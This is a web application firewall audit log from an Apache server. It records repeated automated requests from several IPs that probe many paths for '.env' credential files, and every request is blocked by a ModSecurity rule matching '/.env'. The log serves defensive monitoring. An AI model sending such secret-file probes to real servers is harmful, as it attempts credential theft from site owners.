Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa18f33e-Z-- --a472310c-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SwAAAA8 103.236.140.4 40120 103.236.140.4 8181 --a472310c-B-- GET /cron/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a472310c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a472310c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778576168 626 (- - -) Stopwatch2: 1745417778576168 626; combined=263, p1=232, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a472310c-Z-- --6d7b726f-A-- [23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517TAAAAAk 103.236.140.4 40122 103.236.140.4 8181 --6d7b726f-B-- GET /www/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --6d7b726f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d7b726f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417778741992 679 (- - -) Stopwatch2: 1745417778741992 679; combined=262, p1=232, p2=0, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d7b726f-Z-- --d5093154-A-- [23/Apr/2025:21:32:42 +0700] aAj6Cj1ahuoJLEjKiAUe8AAAAJY 103.236.140.4 54214 103.236.140.4 8181 --d5093154-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d5093154-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5093154-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418762499010 811 (- - -) Stopwatch2: 1745418762499010 811; combined=328, p1=293, p2=0, p3=0, p4=0, p5=35, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5093154-Z-- --d2783f1e-A-- [23/Apr/2025:21:32:43 +0700] aAj6CxuwXEWV6ydgl51-aQAAAAg 103.236.140.4 54224 103.236.140.4 8181 --d2783f1e-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d2783f1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2783f1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418763816851 846 (- - -) Stopwatch2: 1745418763816851 846; combined=327, p1=287, p2=0, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2783f1e-Z-- --1937cc00-A-- [23/Apr/2025:21:32:45 +0700] aAj6DTI97BrbgvDq16RTZgAAANU 103.236.140.4 54242 103.236.140.4 8181 --1937cc00-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1937cc00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1937cc00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418765137858 777 (- - -) Stopwatch2: 1745418765137858 777; combined=290, p1=253, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1937cc00-Z-- --d9e0af30-A-- [23/Apr/2025:21:32:46 +0700] aAj6DtIw_rqnm4P5_ae3TgAAAFA 103.236.140.4 54264 103.236.140.4 8181 --d9e0af30-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d9e0af30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9e0af30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418766451299 834 (- - -) Stopwatch2: 1745418766451299 834; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9e0af30-Z-- --315d6738-A-- [23/Apr/2025:21:32:57 +0700] aAj6GRuwXEWV6ydgl51-bQAAABA 103.236.140.4 54462 103.236.140.4 8181 --315d6738-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --315d6738-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --315d6738-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418777124590 799 (- - -) Stopwatch2: 1745418777124590 799; combined=301, p1=267, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --315d6738-Z-- --5d13f715-A-- [23/Apr/2025:21:32:58 +0700] aAj6GhuwXEWV6ydgl51-bwAAAAA 103.236.140.4 54476 103.236.140.4 8181 --5d13f715-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5d13f715-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d13f715-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745418778435978 867 (- - -) Stopwatch2: 1745418778435978 867; combined=369, p1=337, p2=0, p3=0, p4=0, p5=31, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d13f715-Z-- --a39cb55f-A-- [23/Apr/2025:22:17:41 +0700] aAkElTI97BrbgvDq16RcrgAAANc 103.236.140.4 37162 103.236.140.4 8181 --a39cb55f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 Accept-Charset: utf-8 --a39cb55f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a39cb55f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745421461991897 902 (- - -) Stopwatch2: 1745421461991897 902; combined=322, p1=271, p2=0, p3=0, p4=0, p5=51, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a39cb55f-Z-- --864ddc30-A-- [23/Apr/2025:23:13:21 +0700] aAkRoT1ahuoJLEjKiAU05QAAAII 103.236.140.4 38022 103.236.140.4 8181 --864ddc30-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --864ddc30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --864ddc30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801387951 861 (- - -) Stopwatch2: 1745424801387951 861; combined=325, p1=287, p2=0, p3=0, p4=0, p5=38, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --864ddc30-Z-- --1d19c751-A-- [23/Apr/2025:23:13:21 +0700] aAkRodIw_rqnm4P5_afOIwAAAFE 103.236.140.4 38032 103.236.140.4 8181 --1d19c751-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1d19c751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d19c751-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801581101 717 (- - -) Stopwatch2: 1745424801581101 717; combined=267, p1=235, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d19c751-Z-- --7e13607e-A-- [23/Apr/2025:23:13:21 +0700] aAkRoRuwXEWV6ydgl52X0gAAAAs 103.236.140.4 38034 103.236.140.4 8181 --7e13607e-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7e13607e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e13607e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801774460 822 (- - -) Stopwatch2: 1745424801774460 822; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e13607e-Z-- --1206fb71-A-- [23/Apr/2025:23:13:21 +0700] aAkRoRuwXEWV6ydgl52X1AAAAAM 103.236.140.4 38040 103.236.140.4 8181 --1206fb71-B-- GET /code/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1206fb71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1206fb71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801968429 833 (- - -) Stopwatch2: 1745424801968429 833; combined=305, p1=271, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1206fb71-Z-- --b831c243-A-- [23/Apr/2025:23:13:22 +0700] aAkRoj1ahuoJLEjKiAU05wAAAIQ 103.236.140.4 38046 103.236.140.4 8181 --b831c243-B-- GET /db/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b831c243-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b831c243-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802163200 815 (- - -) Stopwatch2: 1745424802163200 815; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b831c243-Z-- --26fcfe25-A-- [23/Apr/2025:23:13:22 +0700] aAkRohuwXEWV6ydgl52X1gAAABM 103.236.140.4 38052 103.236.140.4 8181 --26fcfe25-B-- GET /login/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --26fcfe25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26fcfe25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802357076 832 (- - -) Stopwatch2: 1745424802357076 832; combined=346, p1=284, p2=0, p3=0, p4=0, p5=62, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26fcfe25-Z-- --daf8f647-A-- [23/Apr/2025:23:13:22 +0700] aAkRotIw_rqnm4P5_afOJQAAAEA 103.236.140.4 38058 103.236.140.4 8181 --daf8f647-B-- GET /api_v1/go/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --daf8f647-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daf8f647-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802551230 700 (- - -) Stopwatch2: 1745424802551230 700; combined=253, p1=224, p2=0, p3=0, p4=0, p5=29, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daf8f647-Z-- --7bbb597b-A-- [23/Apr/2025:23:13:22 +0700] aAkRojI97BrbgvDq16RsSQAAAM4 103.236.140.4 38068 103.236.140.4 8181 --7bbb597b-B-- GET /api_v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7bbb597b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bbb597b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802747608 729 (- - -) Stopwatch2: 1745424802747608 729; combined=268, p1=239, p2=0, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bbb597b-Z-- --b09c2c64-A-- [23/Apr/2025:23:13:22 +0700] aAkRojI97BrbgvDq16RsSgAAANA 103.236.140.4 38074 103.236.140.4 8181 --b09c2c64-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b09c2c64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b09c2c64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802940935 918 (- - -) Stopwatch2: 1745424802940935 918; combined=356, p1=319, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
